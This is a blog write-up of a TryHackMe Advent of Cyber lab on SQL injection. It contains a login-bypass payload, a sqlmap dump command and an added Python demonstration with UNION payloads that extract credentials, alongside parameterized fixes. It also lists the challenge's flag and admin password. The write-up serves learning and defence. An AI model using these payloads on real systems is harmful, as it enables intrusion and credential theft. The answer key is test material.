Adam Thompson
4 min read · Dec 6, 2020


TryHackMe Advent of Cyber 2, day 5, Write up.

Today was rough, and I almost did not even get to log onto TryHackMe and complete day 5. It seemed like things kept popping up and needing to be taken care of. Thankfully I was able to complete everything that needed doing, squeeze in a few minutes, and continue my daily write-ups for the TryHackMe Advent of Cyber 2.

Today they are teaching us about SQL injection: bypassing logins, using it to access database information, blind SQL injection, and a new tool called SQLmap! They also showed us how to use BurpSuite in conjunction with SQLmap, which was pretty cool.

After reading the instructions and lessons, I started up the attackbox and the machine we would be using our newfound skills against.

After everything was up and running, I followed the instructions and pasted 10.10.136.69:8000 into the URL bar of the Firefox browser window on the attackbox.

This opened a page which welcomed us to “Santa’s Official Form”. There were no login options anywhere I could see, and I tried clicking on everything, but I couldn’t find anything useful on the page.

The first question of the challenge asked what Santa's secret login panel is. I had no idea, so I kept poking around on the webpage and looking at the page source; nothing jumped out at me. I relented and clicked on the "hint" button, and it told me that the name is derived from 2 words in this question. I could see that it had a "/" before the answer, so I figured it would have to go into the URL somewhere. I decided to place it after the :8000 port. After about 15 minutes of guessing, I finally landed on 10.10.136.69:8000/santapanel, which was correct and brought me to a new page with a place to enter a username and password.

I tried a bunch of guessing, but nothing worked. I knew I had read something in the instructions about bypassing a login screen, so I read it all over again. I saw the part where it mentioned "Remember that 1=1 in SQL stands for True" and wrote that down as important. A bit further on it talked about putting ' or true -- in the username field. I figured this was important as well, so I wrote it down. Nothing else jumped out at me for my current problem, so I went back and looked at my notes. I could see that the single ' would break the normal functionality of the input box, that 1=1 is a true statement, which the "or true" portion of the statement would validate, and that the -- commented out the password-checking part, essentially making the application forget to check whether the password is correct. So, putting it all together, I tried admin' or 1=1 -- in the username field and admin in the password field, and it let me in! I had bypassed the login screen!

I was then greeted by a new webpage with a picture of Santa on it and a "welcome back, Santa" message. The page also had a message stating "the database has been updated while you were away!", an empty input box with the word "Enter:" next to it, and a small table with Gift and Child labels.

So, looking back at the questions, I had bypassed the login using SQLi, so I marked that one complete.

The next question asked, “how many entries are there in the gift database?” Yeah, I had no idea where to find that information…

Back to the instructions again.

I spent the next 30 minutes going over the instructions and saw that I had to turn on the Burp proxy in Firefox, turn on intercept in BurpSuite, and then submit a query on the page I was on so that BurpSuite could capture the request for use with SQLmap.

OK, so I followed the instructions, turned on the correct tools, intercepted the request, then saved it to my root directory so I could use it in SQLmap.

Not going to lie, I had never used SQLmap before, and I could not figure out what syntax I needed to make it do what I wanted. It took re-reading the instructions, looking at the man page for sqlmap, and more trial and error than needed, but I was able to get it formatted correctly in the end:

sqlmap -r intercept.request --tamper=space2comment --dump-all --dbms sqlite

This command spit out a ton of information! I was amazed at what it was able to get from the site.
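As an added example, not code from the TryHackMe room or from this write-up's author: a small Python/sqlite3 model of the santapanel login form and the "Enter:" search box. It shows the admin' or 1=1 -- bypass described above, the UNION-based extraction through the search box that sqlmap automated (the gift count and the admin credentials), what the space2comment tamper does to a payload, and the parameterized fix. The table and column names (users, gifts) and the sample rows are assumed and constructed for illustration; they are not the room's real schema or data.

```python
import sqlite3

# Constructed sample data standing in for Santa's gift database.
# Table/column names are assumed; they are not the room's real schema.
USERS = [("admin", "hunter2-example")]
GIFTS = [("bike", "Alice"), ("train set", "Bob"), ("puzzle", "Carol")]


def build_db():
    """In-memory SQLite stand-in for the backend (the room's DBMS was sqlite)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    con.execute("CREATE TABLE gifts (gift TEXT, child TEXT)")
    con.executemany("INSERT INTO gifts VALUES (?, ?)", GIFTS)
    return con


def vulnerable_login(con, username, password):
    """The bug: user input is spliced into the SQL text. A quote closes the
    string literal, OR 1=1 makes the WHERE clause always true, and -- turns
    the rest of the line (the password check) into a comment."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return con.execute(query).fetchone() is not None


def safe_login(con, username, password):
    """The fix: bound parameters. The input is data, never SQL syntax."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row is not None


def vulnerable_search(con, term):
    """The panel's search box with the same bug; this is the kind of request
    sqlmap took from the Burp capture and used to dump the database."""
    query = f"SELECT gift, child FROM gifts WHERE gift LIKE '%{term}%'"
    return con.execute(query).fetchall()


def safe_search(con, term):
    """Parameterized search: the wildcard is added to the bound value."""
    return con.execute("SELECT gift, child FROM gifts WHERE gift LIKE ?",
                       (f"%{term}%",)).fetchall()


def space2comment(payload):
    """Simplified version of what sqlmap's space2comment tamper does: replace
    spaces with /**/ so filters that key on whitespace miss the injection.
    SQLite (and most engines) treat a C-style comment as whitespace."""
    return payload.replace(" ", "/**/")


def demo():
    con = build_db()
    bypass = "admin' or 1=1 --"
    # UNION payloads: a search term that matches nothing, then our own SELECT.
    # Both SELECTs must return the same number of columns (two here).
    count_payload = "zzz' UNION SELECT count(*), '' FROM gifts --"
    creds_payload = "zzz' UNION SELECT username, password FROM users --"
    return {
        "vuln_bypass": vulnerable_login(con, bypass, "admin"),
        "safe_bypass": safe_login(con, bypass, "admin"),
        "gift_count": vulnerable_search(con, count_payload)[0][0],
        "creds": vulnerable_search(con, creds_payload),
        "tampered_creds": vulnerable_search(con, space2comment(creds_payload)),
        "safe_search": safe_search(con, creds_payload),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running it shows the vulnerable login accepting the bypass while the parameterized one rejects it, the search box returning the row count and the admin row from a different table, the /**/-tampered payload still working, and the parameterized search treating the whole payload as a literal search term that matches nothing.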

The last 4 questions all had to do with finding information in what sqlmap had spit out, so this wasn't too difficult.

I was able to find how many entries there were in the gift database (22), what Paul asked for (github ownership), the flag for the challenge (thmfox{All_I_Want_for_Christmas_Is_You}), and the admin's password (EhCNSWzzFP6sc7gB).

Very nice challenge today TryHackMe, I really enjoyed it.

Adam Thompson

Father, information security enthusiast, lifelong learner, gamer, music lover, trying to be a little better at everything each day.